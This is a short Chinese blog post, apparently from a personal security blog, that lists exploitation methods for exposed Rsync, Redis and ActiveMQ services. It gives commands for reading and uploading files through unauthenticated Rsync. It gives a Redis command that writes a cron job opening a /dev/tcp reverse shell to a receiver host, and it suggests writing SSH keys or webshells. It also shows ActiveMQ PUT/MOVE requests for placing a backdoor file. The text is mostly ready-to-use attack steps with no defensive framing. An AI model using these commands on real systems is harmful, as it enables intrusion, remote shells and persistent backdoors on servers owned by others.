常见漏洞的利用方式!!

Admin 2020-06-20 82人围观 ,发现0个评论 漏洞利用Web安全

记录一些常见服务器容器/框架漏洞利用方法

 常见漏洞的利用方式!! Web安全

Rsync 未授权访问漏洞

对应端口:873

Rsync 是 linux 下一款文件同步工具。

1.读取文件

root@kali:~# rsync 192.168.3.XXX::
root@kali:~# rsync 192.168.3.XXX:: routing //查看 routing 目录
Linux

2.下载文件

root@kali:~#rsync -avz 192.168.3.xxx:: routing/x.txt /root //下载 routing 目录下的 x.txt 到本地
Linux

3.上传文件

root@kali:~# rsync -avz x.php 192.168.3.xxx:: routing
Linux

Redis 服务器远程执行漏洞

对应端口:6379

Redis 是一个 key-value 存储系统,是一个高性能的 key-value 数据库。

1.连接服务

root@kali:~/{redis_dir}/src# ./redis-cli -h {sender_ip} -p {sender_port}
Linux

2.反弹权限

root@kali:~/{redis_dir}/src# echo -e "\n\n */1 * * * * /bin/bash -i >&/dev/tcp/{receiver_ip}/{receiver_port}>&1\n\n"|/root/{redis_dir}/src/redis-cli -h {sender_ip} -p {sender_port} -x set {sending_cycle(min)}
Linux

3.其他姿势

    写入 SSH 的 key,然后利用 key 远程登录;
    替换 redis 服务器 passwd 文件;
    写入网马(前提需要找到网站路径);
Linux

ActiveMQ 远程代码执行漏洞

对应端口:8161

ActiveMQ 是 Apache 出品,最流行的,能力强劲的开源消息总线。
注意:本漏洞需要 ActiveMQ 服务的密码。

1.写入文件

PUT /dir/x.php
POST {backdoor_code}
C

2.移动文件

MOVE /dir/x.php
Destination: file://{local_path_of_backdoor}


请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客